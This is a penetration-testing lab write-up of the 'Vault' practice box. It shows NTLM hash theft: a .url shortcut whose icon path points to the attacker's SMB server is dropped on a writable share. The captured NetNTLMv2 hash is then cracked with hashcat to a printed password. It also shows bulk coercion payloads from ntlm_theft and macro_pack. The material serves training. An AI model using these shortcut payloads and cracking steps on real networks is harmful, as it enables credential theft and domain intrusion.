Windows Internet Shortcut
Windows Internet Shortcut files, typically with the .url extension, are used to store the URL of a web page. These files are plain text and contain the internet address along with metadata such as the icon location and working directory. When double-clicked, they open the specified URL in the user’s default web browser. They are commonly used for quickly accessing websites or organizing web links on a desktop or within a file system.
Windows Internet Shortcut files can be exploited by embedding malicious URLs, leading to phishing attacks or drive-by downloads when opened, potentially compromising the system. Attackers can also manipulate these files to execute arbitrary commands or scripts by exploiting the way Windows handles certain parameters within the shortcut.
Most important thing here is that there is no limit to protocol used, and it makes it a well-known trick among adversaries
Given that there is a SMB share named, DocumentsShare, it would be rational to assume that files within this share might get shared across the domain.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ cat shortcut.url
[InternetShortcut]
WorkingDirectory=\\192.168.45.204\
IconIndex=0
IconFile=\\192.168.45.204\%USERNAME%I will create a URL file, with the icon trick, pointing to the Kali’s SMB server using the UNC path
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ smbclient //$IP/DocumentsShare -U kali -N -c 'put shortcut.url'
lpcfg_do_global_parameter: WARNING: The "syslog" option is deprecated
putting file shortcut.url as \shortcut.url (1.7 kb/s) (average 1.7 kb/s)Placing the malicious URL file to the DocumentsShare share
/Practice/Vault/3-Exploitation/attachments/Pasted-image-20250501211730.png)
Got a hit back on the SMB server on Kali.
Password Cracking
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ hashcat -a 0 -m 5600 anirudh.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
ANIRUDH::VAULT:aaaaaaaaaaaaaaaa:3644a646e2233142b484d7ff9c9a01df:0101000000000000808ed29fcdbadb01e00451bb7e8fc26d00000000010010004c006a00440053004c00670066005200030010004c006a00440053004c00670066005200020010006b005100670058006500540050007a00040010006b005100670058006500540050007a0007000800808ed29fcdbadb0106000400020000000800300030000000000000000100000000200000a26b564bc75a19d5cf9cfdc087083fcddb4c8e97519f75a674e3df5fa98ac4860a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00340035002e003200300034000000000000000000:SecureHM
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: ANIRUDH::VAULT:aaaaaaaaaaaaaaaa:3644a646e2233142b48...000000
Time.Started.....: Thu May 1 21:18:04 2025 (3 secs)
Time.Estimated...: Thu May 1 21:18:07 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 4173.8 kH/s (1.65ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10616832/14344385 (74.01%)
Rejected.........: 0/10616832 (0.00%)
Restore.Point....: 10604544/14344385 (73.93%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: ShaniLana123 -> Saboka54
Hardware.Mon.#1..: Util: 59%
Started: Thu May 1 21:18:04 2025
Stopped: Thu May 1 21:18:09 2025Password hash cracked for the anirudh user; SecureHM
Validation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ impacket-getTGT VAULT.OFFSEC/anirudh@dc.vault.offsec -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password: SecureHM
[*] Saving ticket in anirudh@dc.vault.offsec.ccacheValidated
TGT generated for the anirudh user
WinRM
ntlm_theft
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ ntlm_theft --generate all --server $tun0 --filename payload ; cd payload
Created: payload/payload.scf (BROWSE TO FOLDER)
Created: payload/payload-(url).url (BROWSE TO FOLDER)
Created: payload/payload-(icon).url (BROWSE TO FOLDER)
Created: payload/payload.lnk (BROWSE TO FOLDER)
Created: payload/payload.rtf (OPEN)
Created: payload/payload-(stylesheet).xml (OPEN)
Created: payload/payload-(fulldocx).xml (OPEN)
Created: payload/payload.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: payload/payload-(includepicture).docx (OPEN)
Created: payload/payload-(remotetemplate).docx (OPEN)
Created: payload/payload-(frameset).docx (OPEN)
Created: payload/payload-(externalcell).xlsx (OPEN)
Created: payload/payload.wax (OPEN)
Created: payload/payload.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: payload/payload.asx (OPEN)
Created: payload/payload.jnlp (OPEN)
Created: payload/payload.application (DOWNLOAD AND OPEN)
Created: payload/payload.pdf (OPEN AND ALLOW)
Created: payload/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: payload/Autorun.inf (BROWSE TO FOLDER)
Created: payload/desktop.ini (BROWSE TO FOLDER)
Generation Complete.Generating payloads
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault/payload]
└─$ smbclient //$IP/DocumentsShare -U kali -N -c 'prompt; mput *'
lpcfg_do_global_parameter: WARNING: The "syslog" option is deprecated
putting file payload-(remotetemplate).docx as \payload-(remotetemplate).docx (316.9 kb/s) (average 316.9 kb/s)
putting file payload-(externalcell).xlsx as \payload-(externalcell).xlsx (104.1 kb/s) (average 230.9 kb/s)
putting file payload-(stylesheet).xml as \payload-(stylesheet).xml (2.9 kb/s) (average 164.4 kb/s)
putting file payload-(url).url as \payload-(url).url (0.0 kb/s) (average 14.8 kb/s)
putting file payload.pdf as \payload.pdf (12.8 kb/s) (average 14.8 kb/s)
putting file payload.wax as \payload.wax (1.0 kb/s) (average 14.4 kb/s)
putting file payload-(includepicture).docx as \payload-(includepicture).docx (163.6 kb/s) (average 18.3 kb/s)
putting file payload.application as \payload.application (27.8 kb/s) (average 18.6 kb/s)
putting file payload-(frameset).docx as \payload-(frameset).docx (172.2 kb/s) (average 22.2 kb/s)
putting file Autorun.inf as \Autorun.inf (1.5 kb/s) (average 21.8 kb/s)
putting file payload.lnk as \payload.lnk (38.4 kb/s) (average 22.1 kb/s)
putting file payload-(icon).url as \payload-(icon).url (1.9 kb/s) (average 21.7 kb/s)
putting file payload.htm as \payload.htm (1.5 kb/s) (average 21.3 kb/s)
putting file payload.scf as \payload.scf (1.5 kb/s) (average 20.9 kb/s)
putting file payload.rtf as \payload.rtf (1.9 kb/s) (average 20.5 kb/s)
putting file payload.jnlp as \payload.jnlp (3.4 kb/s) (average 20.1 kb/s)
putting file payload.asx as \payload.asx (2.5 kb/s) (average 19.8 kb/s)
putting file desktop.ini as \desktop.ini (0.9 kb/s) (average 19.4 kb/s)
putting file payload-(fulldocx).xml as \payload-(fulldocx).xml (834.0 kb/s) (average 42.3 kb/s)
putting file zoom-attack-instructions.txt as \zoom-attack-instructions.txt (2.1 kb/s) (average 41.6 kb/s)
putting file payload.m3u as \payload.m3u (0.7 kb/s) (average 40.6 kb/s)Uploading them all. Shotgun
/Practice/Vault/3-Exploitation/attachments/{F1404345-695B-4A95-9875-11FA5E0C55BA}.png)
macro_pack.exe
/Practice/Vault/3-Exploitation/attachments/Pasted-image-20250503024206.png)
MacroPack Community is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. It also handles various shortcuts formats. This tool can be used for red teaming, pentests, demos, and social engineering assessments. MacroPack will simplify antimalware solutions bypass and automatize the process from vb source to final Office document or other payload type. It is very simple to use:
- No configuration required
- Everything can be done using a single line of code
- Generation of majority of Office formats and VBS based formats
- Payloads designed for advanced social engineering attacks (email, USB key, etc)
The tool is compatible with payloads generated by popular pentest tools (Metasploit, Empire, …). It is also easy to combine with other tools as it is possible to read input from stdin and have a quiet output to another tool. T his tool is written in Python3 and works on both Linux and Windows platforms
Note: Windows platform with the right MS Office applications installed is required for Office documents automatic generation or trojan features.
.url
PS C:\Users\admin\Desktop\macro_pack> echo "\\\\192.168.45.204\\blahblah" | .\macro_pack.exe -G payload.url
_ _ __ ___ ____ __ ____ __ ___ __ _
( \/ ) / _\ / __)( _ \ / \ ( _ \ / _\ / __)( / )
/ \/ \/ \( (__ ) /( O ) ) __// \( (__ ) (
\_)(_/\_/\_/ \___)(__\_) \__/ (__) \_/\_/ \___)(__\_)
Malicious Office, VBS, Shortcuts and other formats for pentests and redteam - Version:2.2.0 Release:Community
[+] Preparations...
[-] Waiting for piped input feed...
[-] Target output format: URL Shortcut
[-] Temporary working dir: C:\Users\admin\Desktop\macro_pack\temp
[+] Prepare URL Shortcut file generation...
[+] Generating URL Shortcut file...
[-] Generated URL file: C:\Users\admin\Desktop\macro_pack\payload.url
[-] Test with :
Click on C:\Users\admin\Desktop\macro_pack\payload.url file to test.
[+] Cleaning...
Done!Creating the payload.url file
.lnk
PS C:\Users\admin\Desktop\macro_pack> echo "\\\\192.168.45.204\blahblah" | .\macro_pack.exe -G payload.lnk
_ _ __ ___ ____ __ ____ __ ___ __ _
( \/ ) / _\ / __)( _ \ / \ ( _ \ / _\ / __)( / )
/ \/ \/ \( (__ ) /( O ) ) __// \( (__ ) (
\_)(_/\_/\_/ \___)(__\_) \__/ (__) \_/\_/ \___)(__\_)
Malicious Office, VBS, Shortcuts and other formats for pentests and redteam - Version:2.2.0 Release:Community
[+] Preparations...
[-] Waiting for piped input feed...
[-] Target output format: Shell Link
[-] Temporary working dir: C:\Users\admin\Desktop\macro_pack\temp
[+] Prepare Shell Link file generation...
[+] Generating Shell Link file...
[-] Generated Shell Link file: C:\Users\admin\Desktop\macro_pack\payload.lnk
[-] Test with:
Browse C:\Users\admin\Desktop\macro_pack\payload.lnk dir to trigger icon resolution. Click on file to trigger shortcut.
[+] Cleaning...
Done!